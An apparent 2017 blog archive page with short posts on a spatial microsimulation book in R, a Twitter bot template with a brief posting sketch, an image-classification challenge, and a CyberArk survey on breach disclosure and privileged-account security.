Support these collaborators and other investigative journalists at every opportunity. You never know when one of their stories will impact your reporting on a frothing, tantrum throwing, press hater closer to the United States.

December 14, 2017

Spatial Microsimulation with R – Public Policy Advocates Take Note

Filed under: Environment,R,Simulations — Patrick Durusau @ 11:28 am

Spatial Microsimulation with R by Robin Lovelace and Morgane Dumont.

Apologies for the long quote below but spatial microsimulation is unfamiliar enough that it merited an introduction in the authors’ own prose.

We have all attended public meetings where developers, polluters, landfill operators, etc., had charts, studies, etc., and the public was armed with, well, its opinions.

Spatial Microsimulation with R can put you in a position to offer alternative analysis, meaningfully ask for data used in other studies, in short, arm yourself with weapons long abused in public policy discussions.

From Chapter 1, 1.2 Motivations:


Imagine a world in which data on companies, households and governments were widely available. Imagine, further, that researchers and decision-makers acting in the public interest had tools enabling them to test and model such data to explore different scenarios of the future. People would be able to make more informed decisions, based on the best available evidence. In this technocratic dreamland pressing problems such as climate change, inequality and poor human health could be solved.

These are the types of real-world issues that we hope the methods in this book will help to address. Spatial microsimulation can provide new insights into complex problems and, ultimately, lead to better decision-making. By shedding new light on existing information, the methods can help shift decision-making processes away from ideological bias and towards evidence-based policy.

The ‘open data’ movement has made many datasets more widely available. However, the dream sketched in the opening paragraph is still far from reality. Researchers typically must work with data that is incomplete or inaccessible. Available datasets often lack the spatial or temporal resolution required to understand complex processes. Publicly available datasets frequently miss key attributes, such as income. Even when high quality data is made available, it can be very difficult for others to check or reproduce results based on them. Strict conditions inhibiting data access and use are aimed at protecting citizen privacy but can also serve to block democratic and enlightened decision making.

The empowering potential of new information is encapsulated in the saying that ‘knowledge is power’. This helps explain why methods such as spatial microsimulation, that help represent the full complexity of reality, are in high demand.

Spatial microsimulation is a growing approach to studying complex issues in the social sciences. It has been used extensively in fields as diverse as transport, health and education (see Chapter ), and many more applications are possible. Fundamental to the approach are approximations of individual level data at high spatial resolution: people allocated to places. This spatial microdata, in one form or another, provides the basis for all spatial microsimulation research.

The purpose of this book is to teach methods for doing (not reading about!) spatial microsimulation. This involves techniques for generating and analysing spatial microdata to get the ‘best of both worlds’ from real individual and geographically-aggregated data. Population synthesis is therefore a key stage in spatial microsimulation: generally real spatial microdata are unavailable due to concerns over data privacy. Typically, synthetic spatial microdatasets are generated by combining aggregated outputs from Census results with individual level data (with little or no geographical information) from surveys that are representative of the population of interest.

The resulting spatial microdata are useful in many situations where individual level and geographically specific processes are in operation. Spatial microsimulation enables modelling and analysis on multiple levels. Spatial microsimulation also overlaps with (and provides useful initial conditions for) agent-based models (see Chapter 12).

Despite its utility, spatial microsimulation is little known outside the fields of human geography and regional science. The methods taught in this book have the potential to be useful in a wide range of applications. Spatial microsimulation has great potential to be applied to new areas for informing public policy. Work of great potential social benefit is already being done using spatial microsimulation in housing, transport and sustainable urban planning. Detailed modelling will clearly be of use for planning for a post-carbon future, one in which we stop burning fossil fuels.

For these reasons there is growing interest in spatial microsimulation. This is due largely to its practical utility in an era of ‘evidence-based policy’ but is also driven by changes in the wider research environment inside and outside of academia. Continued improvements in computers, software and data availability mean the methods are more accessible than ever. It is now possible to simulate the populations of small administrative areas at the individual level almost anywhere in the world. This opens new possibilities for a range of applications, not least policy evaluation.

Still, the meaning of spatial microsimulation is ambiguous for many. This book also aims to clarify what the method entails in practice. Ambiguity surrounding the term seems to arise partly because the methods are inherently complex, operating at multiple levels, and partly due to researchers themselves. Some uses of the term ‘spatial microsimulation’ in the academic literature are unclear as to its meaning; there is much inconsistency about what it means. Worse is work that treats spatial microsimulation as a magical black box that just ‘works’ without any need to describe, or more importantly make reproducible, the methods underlying the black box. This book is therefore also about demystifying spatial microsimulation.

If that wasn’t impressive enough, the authors add:


We’ve put Spatial Microsimulation with R on-line because we want to reduce barriers to learning. We’ve made it open source via a GitHub repository because we believe in reproducibility and collaboration. Comments and suggests are most welcome there. If the content of the book helps your research, please cite it (Lovelace and Dumont, 2016).

How awesome is that!

Definitely a model for all of us to emulate!

Twitter Bot Template – If You Can Avoid Twitter Censors

Filed under: Bots,Python,Twitter — Patrick Durusau @ 11:04 am

Twitter Bot Template

From the webpage:

Boilerplate for creating simple, non-interactive twitter bots that post periodically. My comparisons bot, @botaphor, is an example of how I use this template in practice.

This is intended for coders familiar with Python and bash.

If you can avoid Twitter censors (new rules, erratically enforced, a regular “feature”), then this Twitter bot template may interest you.
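The heart of any such bot is only a few lines. A minimal sketch with tweepy (not the template’s actual code; credentials are placeholders, and scheduling is left to cron or similar, in keeping with the template’s periodic, non-interactive design):

    import random
    import tweepy

    # Placeholder credentials: supply your own app keys.
    auth = tweepy.OAuthHandler("CONSUMER_KEY", "CONSUMER_SECRET")
    auth.set_access_token("ACCESS_TOKEN", "ACCESS_SECRET")
    api = tweepy.API(auth)

    # A non-interactive bot just picks something to say and posts it.
    lines = ["Topic maps are like subway maps for subjects.",
             "Semantic diversity is a feature, not a bug."]
    api.update_status(random.choice(lines))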

Make tweet filtering a commercial opportunity and Twitter can drop tweet censorship, a cost center with no profit.

Unlikely because policing other people is such a power turn-on.

Still, this is the season for wishes.

Visual Domain Decathlon

Filed under: Image Recognition,Image Understanding — Patrick Durusau @ 10:34 am

Visual Domain Decathlon

From the webpage:

The goal of this challenge is to solve simultaneously ten image classification problems representative of very different visual domains. The data for each domain is obtained from the following image classification benchmarks:

  1. ImageNet [6].
  2. CIFAR-100 [2].
  3. Aircraft [1].
  4. Daimler pedestrian classification [3].
  5. Describable textures [4].
  6. German traffic signs [5].
  7. Omniglot. [7]
  8. SVHN [8].
  9. UCF101 Dynamic Images [9a,9b].
  10. VGG-Flowers [10].

The union of the images from the ten datasets is split into training, validation, and test subsets. Different domains contain different image categories as well as a different number of images.

The task is to train the best possible classifier to address all ten classification tasks using the training and validation subsets, apply the classifier to the test set, and send us the resulting annotation file for assessment. The winner will be determined based on a weighted average of the classification performance on each domain, using the scoring scheme described below. At test time, your model is allowed to know the ground-truth domain of each test image (ImageNet, CIFAR-100, …) but, of course, not its category.

It is up to you to make use of the data, and you can either train a single model for all tasks or ten independent ones. However, you are not allowed to use any external data source for training. Furthermore, we ask you to report the overall size of the model(s) used.

The competition is over but you can continue to submit results and check the leaderboard. (There’s an idea that merits repetition.)

Will this be your entertainment game for the holidays?

Enjoy!

98% Fail Rate on Privileged Accounts – Transparency in 2018

Filed under: Cybersecurity,Government,Government Data,Security,Transparency — Patrick Durusau @ 9:55 am

Half of companies fail to tell customers about data breaches, claims study by Nicholas Fearn.

From the post:

Half of organisations don’t bother telling customers when their personal information might have been compromised following a cyber attack, according to a new study.

The latest survey from security firm CyberArk comes with the full implementation of the European Union General Data Protection Regulation (GDPR) just months away.

Organisations that fail to notify the relevant data protection authorities of a breach within 72 hours of finding it can expect to face crippling fines of up to four per cent of turnover – with companies trying to hide breaches likely to be hit with the biggest punishments.

The findings have been published in the second iteration of the CyberArk Global Advanced Threat Landscape Report 2018, which explores business leaders’ attitudes towards IT security and data protection.

The survey found that, overall, security “does not translate into accountability”. Some 46 per cent of organisations struggle to stop every attempt to breach their IT infrastructure.

And 63 per cent of business leaders acknowledge that their companies are vulnerable to attacks, such as phishing. Despite this concern, 49 per cent of organisations don’t have the right knowledge about security policies.

You can download the report cited in Fearn’s post at: Cyberark Global Advanced Threat Landscape Report 2018: The Business View of Security.

If you think that report has implications for involuntary/inadvertent transparency, Cyberark Global Advanced Threat Landscape Report 2018: Focus on DevOps, reports this gem:


It’s not just that businesses underestimate threats. As noted above, they also do not seem to fully understand where privileged accounts and secrets exist. When asked which IT environments and devices contain privileged accounts and secrets, responses (IT decision maker and DevOps/app developer respondents) were at odds with the claim that most businesses have implemented a privileged account security solution. A massive 98% did not select at least one of the ‘containers’, ‘microservices’, ‘CI/CD tools’, ‘cloud environments’ or ‘source code repositories’ options. At the risk of repetition, privileged accounts and secrets are stored in all of these entities.

A fail rate of 98% on identifying “privileged accounts and secrets?”

Reports like this make you wonder about the clamor for transparency of organizations and governments. Why bother?

Information in 2018 is kept secure by a lack of interest in collecting it.

Remember that for your next transparency discussion.
